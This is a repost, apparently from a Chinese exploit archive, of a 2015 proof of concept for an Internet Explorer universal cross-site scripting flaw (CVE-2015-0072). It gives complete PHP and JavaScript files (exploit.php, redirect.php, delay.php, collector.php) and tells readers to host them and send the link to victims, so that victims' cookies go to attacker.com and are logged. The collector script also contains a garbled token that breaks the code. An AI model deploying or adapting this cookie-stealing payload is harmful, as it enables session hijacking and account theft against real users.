Microsoft Internet Explorer Universal XSS Proof Of Concept

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Microsoft Internet Explorer Universal XSS Proof Of Concept

来源：http://innerht.ml/blog/ie-uxss.html 作者：bhdresh 发布时间：2015-02-10

Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072)

Host below files on webserver (attacker.com) and share the exploit link with victims,

exploit.php --- exploit link (Share with victim)

redirect.php --- Script to redirect on target page (target page should not contain X-Frame-Options or it will fail)

delay.php --- Script to add delay

collector.php --- Script to collect hijacked cookie

log.txt --- Collected cookies will be stored in this text file

-------------------------------------exploit.php-----------------------------------
<iframe src="redirect.php" style="display:none"></iframe>
<iframe src="https://target.com/" style="display:none"></iframe>
<script>
    top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","http://attacker.com/delay.php",false),send();_.location="javascript:bkp=\'http://attacker.com/collector.php?\'+document.cookie;alert(bkp);window.location(bkp);"');
</script>
--------------------------------------------------------------------------------------

-------------------------------------redirect.php-----------------------------------
<?php 
header("Location: https://target.com/"); 
exit(); 
?>
--------------------------------------------------------------------------------------

-------------------------------------delay.php-----------------------------------
<?php 
sleep(15); 
echo 'Bhdresh'; 
exit(); 
?>
--------------------------------------------------------------------------------------

-------------------------------------collector.php-----------------------------------
<?php 
$f = fopen("log.txt", 'a'); 
fwrite($f, ___FCKpd___0
SERVER["REQUEST_URI"]."\n"); 
fclose($f); 
header("Location: http://www.youtube.com/");
?>

--------------------------------------------------------------------------------------

-------------------------------------log.txt-----------------------------------
- Create a file as log.txt and modify the permissions (chmod 777 log.txt)
--------------------------------------------------------------------------------------
Demo: facabook.net16.net/exploit.php
Reference: http://innerht.ml/blog/ie-uxss.html

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告